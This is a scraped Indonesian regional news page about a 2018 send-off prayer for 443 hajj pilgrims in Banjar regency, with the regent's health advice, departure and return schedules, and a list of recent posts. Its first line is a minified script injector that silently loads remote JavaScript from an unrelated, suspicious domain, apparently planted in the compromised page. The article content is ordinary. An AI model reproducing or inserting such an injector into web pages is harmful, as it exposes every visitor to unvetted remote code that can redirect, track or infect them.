(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Bupati Banjar Ingatkan Calon Haji untuk Jaga Kesehatan Selama di Tanah Suci


MARTAPURA, Ratusan calon jamaah haji menggelar sholat hajat berjamaah di Mahligai Sultan Adam, Martapura, Kabupaten Banjar, Rabu (11/7).  Kegiatan ini sebagai momentum pelepasan keberangkatan jamaah calon haji ke tanah suci tahun 2018.

Bupati Banjar KH Khalilurrahman pun sempat menjadi imam sholat hajat. Bupati juga mengingatkan agar calon jamaah haji menjaga kesehatan dengan mengatur pola makan tepat waktu dan membawa bekal persiapan ketika ibadah.

“Jagalah kesehatan dengan mengkonsumsi makanan yang bergizi. Jangan sampai tidak ingat makan dan selalu minum yang cukup,” ujarnya.

Selain itu orang nomor satu di Kabupaten Banjar tersebut juga berpesan agar calon jamaah mengatur keseimbangan antara pelaksanaan ibadah haji serta waktu istirahat dan juga selalu menjaga kebersamaan. Saling tolong menolong dan jangan malu bertanya apabila tidak paham.

Sementara itu menurut Kepala Kantor Kementerian Agama Kabupaten Banjar Drs. H. Izzuddin M. Ag mengatakan, berdasarkan laporan kementerian agama Kabupaten Banjar, data calon jamaah haji yang berangkat pada tahun 2018 ini ada sebanyak 443 orang. Terdiri dari tiga kloter dan dua gelombang.

“Untuk calon jamaah haji pada tahun 2018 ini terdiri dari tiga kloter dengan dua gelombang dengan total jamaah sebanyak 443 orang, yang terdiri dari laki-laki sebanyak 203 orang dan perempuan sebanyak 240 orang,” sahutnya.

Jelasnya Izzuddin, salah satunya yang berangkat pada akhir-akhir ini yaitu untuk kloter dua ada sebanyak 30 orang dan akan masuk pada gelombang pertama akan masuk asrama dan berangkat pada tanggal 21 Juli dari embarkasi Banjarmasin ke Madinah.

Sedangkan adapun kepulangan pertama menuju Banjarmasin, akan dilaksanakan kloter kedua pada tanggal 31 Agustus dan diprediksi sampai pada tanggal 1 September. Sedangkan untuk kloter empat akan dipulangkan pada tanggal 4 September dan akan sampai di Banjarmasin pada keesokan harinya yaitu pada tanggal 5 September.

“Mudah-mudahan tiga kuarter yang masuk dan akan berangkat ini semua jamaah bisa berangkat dengan lancar,bagus,sehat dan pulang dengan selamat,” harapnya. (rendy)

Reporter:Rendy
Editor:Cell

Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

8 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

9 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

9 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

9 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

13 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

15 jam ago

This website uses cookies.